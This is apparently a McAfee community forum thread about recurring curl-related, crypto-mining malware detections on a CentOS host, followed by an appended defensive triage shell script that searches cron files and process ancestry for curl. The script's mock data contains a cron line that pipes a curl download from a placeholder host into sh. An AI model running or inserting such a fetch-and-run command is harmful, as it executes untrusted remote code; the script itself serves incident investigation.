
Malware events triggering frequently on CentOS

Hello Community members

 

We have been seeing a lot of events on one of the Linux hosts, and they all have the same details and are successfully handled. This is an Artemis detection. I assume curl is trying to execute some commands; however, I'm not sure how to troubleshoot this scenario and get to the root cause of it. As per the VirusTotal information, this appears to be a crypto-mining related attempt.

Please advise how we can investigate:

- What curl is trying to execute

- Where these jobs are scheduled to run and what they are

[Attached screenshot: Malware.JPG]

3 Replies

McAfee Employee patrakshar

Re: Malware events triggering frequently on CentOS

Is the drive where you are seeing this detection shared with other users?

Once we have deleted the file from the location and it comes back again, that means some other process is creating it, if not locally then remotely.

If your Artemis level for OAS is set to Medium, then trigger an ODS (preferably offline) on that Linux box with the same Artemis level.

Once the ODS is complete, check if you are still seeing the detection from OAS.

Curl is a shared library here, so there is definitely some other application using it to trigger these events.

Re: Malware events triggering frequently on CentOS

Thanks patrakshar

Not sure if it's been shared with others.
I have validated in the SIEM whether there are any connections to this server from outside; however, I couldn't find any suspicious connections. They are getting detected/deleted and there are no pending-deletion malware events, so would scanning the server offline still be helpful? These are generating almost every minute.

So I was looking for some guidance on how to check the curl execution history and some commands which will be helpful to see which process is creating it.
McAfee Employee patrakshar

Re: Malware events triggering frequently on CentOS

The suggestion of offline scanning was given considering that the machine is shared with others. If that is not the case, then you can directly trigger the ODS.

From the logging side we can only capture what is written within the logs. So if you can share the logs from the /opt/isec/ens/threatprevention/var/ location, we can check more details.
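The two questions the original poster asks (where the job is scheduled, and which process is launching curl) are not answered in the thread itself. The following is an added example, not code from the thread, from McAfee, or from ENS: a small POSIX shell triage script with two helpers. `find_curl_jobs` greps the usual cron locations under a given root for entries invoking curl or wget, and `curl_ancestry` walks a saved `ps -eo pid,ppid,comm,args` snapshot back from every curl process to PID 1 so the launching parent (here a cron-spawned shell) becomes visible. The cron file, the process list and the placeholder URL are constructed sample data so the script runs offline; on a live CentOS host you would pass `/` as the root and a real ps snapshot.

```shell
#!/bin/sh
# Added example (not from the thread or McAfee): triage helpers for the two
# questions asked above. Both take a root directory and a saved ps snapshot so
# they can be exercised offline; on a live host pass / and the output of
# `ps -eo pid,ppid,comm,args`.

# Build a constructed sample tree in a temporary directory. The cron entry and
# the process list are made up for the demonstration; the URL is a placeholder.
make_sample_snapshot() {
  dir=$(mktemp -d)
  mkdir -p "$dir/etc/cron.d" "$dir/var/spool/cron"
  printf '*/1 * * * * root curl -fsSL http://PLACEHOLDER.invalid/x.sh | sh\n' \
    > "$dir/etc/cron.d/example-job"
  printf '0 3 * * * /usr/bin/updatedb\n' > "$dir/var/spool/cron/root"
  cat > "$dir/ps.txt" <<'EOF'
  PID  PPID COMMAND         COMMAND
    1     0 systemd         /usr/lib/systemd/systemd
  812     1 crond           /usr/sbin/crond -n
 4411   812 sh              /bin/sh -c curl -fsSL http://PLACEHOLDER.invalid/x.sh | sh
 4412  4411 curl            curl -fsSL http://PLACEHOLDER.invalid/x.sh
EOF
  echo "$dir"
}

# Question 1: where is the job scheduled? List every cron entry under the given
# root that invokes curl or wget, printed as "file:line" for review.
find_curl_jobs() {
  root=$1
  grep -rHEw 'curl|wget' \
    "$root/etc/crontab" "$root/etc/cron.d" "$root/etc/cron.hourly" \
    "$root/etc/cron.daily" "$root/var/spool/cron" 2>/dev/null
  return 0
}

# Question 2: which process runs curl? Walk the parent chain of every curl
# process in a ps snapshot ($1) back to PID 1, printing
# "1(systemd) -> 812(crond) -> 4411(sh) -> 4412(curl)" for the sample above.
curl_ancestry() {
  awk 'NR > 1 { ppid[$1] = $2; comm[$1] = $3 }
       END {
         for (p in comm) if (comm[p] == "curl") {
           chain = p "(" comm[p] ")"
           q = ppid[p]
           while (q in comm) { chain = q "(" comm[q] ")" " -> " chain; q = ppid[q] }
           print chain
         }
       }' "$1"
}

# Stand-alone run against the constructed sample: sh triage.sh --demo
if [ "${1:-}" = "--demo" ]; then
  snap=$(make_sample_snapshot)
  echo "Scheduled jobs invoking curl/wget:"; find_curl_jobs "$snap"
  echo "Process ancestry of running curl:";  curl_ancestry "$snap/ps.txt"
  rm -rf "$snap"
fi
```

On a real host the same two checks extend naturally: `systemctl list-timers --all` covers systemd timers that cron greps miss, and because the events recur roughly every minute, an auditd file watch on the binary (`-w /usr/bin/curl -p x -k curl_exec`, then `ausearch -k curl_exec`) records the parent PID, user and full command line of each execution at the moment it happens, which is exactly the history the poster was asking for. Cross-check the timestamps against the ENS threat-prevention logs under /opt/isec/ens/threatprevention/var/ mentioned in the reply to tie each detection to its launching process.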
